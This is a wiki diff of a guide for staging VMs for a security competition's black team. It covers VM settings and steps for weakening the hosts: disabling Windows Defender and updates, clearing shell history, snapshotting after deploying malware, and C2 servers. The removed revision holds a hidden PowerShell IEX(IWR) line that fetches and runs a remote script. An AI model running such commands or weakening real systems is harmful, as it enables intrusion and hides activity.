Differences
This shows you the differences between two versions of the page.
Both sides previous revision Previous revision Next revision | Previous revision Next revision Both sides next revision | ||
guides:lockdown_black_team [2019/12/19 04:44] aibekzhy Swappiness |
guides:lockdown_black_team [2020/05/02 10:20] aibekzhy |
||
---|---|---|---|
Line 18: | Line 18: | ||
- Copy Paste Enabled | - Copy Paste Enabled | ||
- Graphics to support Full HD/Automatic Graphics Detection | - Graphics to support Full HD/Automatic Graphics Detection | ||
+ | - Ensure time Synchronized | ||
+ | - Potentially disable DHCP | ||
+ | - Make sure the best NIC type is attached "vmxnet3" -> "vmxnet2" -> etc | ||
* Linux: | * Linux: | ||
Line 24: | Line 27: | ||
- SSH server (installed, enabled, running) | - SSH server (installed, enabled, running) | ||
- Decrease swappiness to 10 | - Decrease swappiness to 10 | ||
- | - Ubuntu specific: | + | - Python2 and python3 installed (less headache if you are using ansible) |
+ | - Ubuntu-specific: | ||
- Ensure networkd is a renderer | - Ensure networkd is a renderer | ||
+ | - Install resolvconf to configure DNS on 18.* | ||
- Fedora specific: | - Fedora specific: | ||
- Depending on implementation look into installing network-scripts | - Depending on implementation look into installing network-scripts | ||
- Install libselinux-python | - Install libselinux-python | ||
- Ensure Release of child OSes match supported OS: https://kb.vmware.com/s/article/1005870 | - Ensure Release of child OSes match supported OS: https://kb.vmware.com/s/article/1005870 | ||
+ | |||
+ | |||
* Windows: | * Windows: | ||
- VMWare tools | - VMWare tools | ||
Line 37: | Line 44: | ||
- Ensure that Windows Remote Management service is started Automatically | - Ensure that Windows Remote Management service is started Automatically | ||
- Enable Ping via Firewall (Allow ICMP Packets) | - Enable Ping via Firewall (Allow ICMP Packets) | ||
- | - Disable Windows Defender (Registry/GPO) | + | - Disable/Uninstall Windows Defender (Registry/GPO) |
- Disable Windows Updates (Registry/GPO/Services) | - Disable Windows Updates (Registry/GPO/Services) | ||
- Ensure Sleep is disabled | - Ensure Sleep is disabled | ||
- | - Try to Debloat as much as possible: https://github.com/Sycnex/Windows10Debloater | + | - Try to Debloat as much as possible: https://github.com/Sycnex/Windows10Debloater (Might not worth it) |
+ | - Sometimes windows may start randomly shutting down. In which case please look into the following | ||
+ | - Use High-performance Battery Profile | ||
+ | - Windows 10 Enterprise specific: | ||
+ | - Make sure when Template is deployed, it has an Ethernet Access. If it doesn't have one, it will reboot endlessly: https://superuser.com/questions/933754/why-does-windows-10-shut-down-hourly-with-initiated-power-off-on-behalf-of-nt-a | ||
* Pfsense: | * Pfsense: | ||
Line 51: | Line 63: | ||
* Ensure you clean up the history of all applications/shells | * Ensure you clean up the history of all applications/shells | ||
* Ensure you take a snapshot of the entire infrastructure after deploying your malware | * Ensure you take a snapshot of the entire infrastructure after deploying your malware | ||
+ | * Manually login to every VM after the red team is done pre-staging. This ensures that everything is still operational, and in addition, it loads a lot of things from disk to memory, which ensures a smoother experience at the start of the competition. | ||
+ | * If the performance of VMs is very slow, try to remove any snapshot that you may need to remove. | ||
Line 66: | Line 80: | ||
Things that are typically requested: | Things that are typically requested: | ||
- | * Windows: Dotnet (powershell.exe -Sta -Nop -w hidden -Command "IEX(IWR 'https://raw.githubusercontent.com/NotoriousRebel/temppp/master/builder.ps1?token=AIVA5C62REQKCZAXPVLPOUS5TAWXC' -UseBasicParsing)") | + | * Windows: |
+ | * Dotnet https://dotnet.microsoft.com/download | ||
+ | * Python executables | ||
* C2 Servers | * C2 Servers | ||
+ | * | ||
===== Naming Conventions ===== | ===== Naming Conventions ===== | ||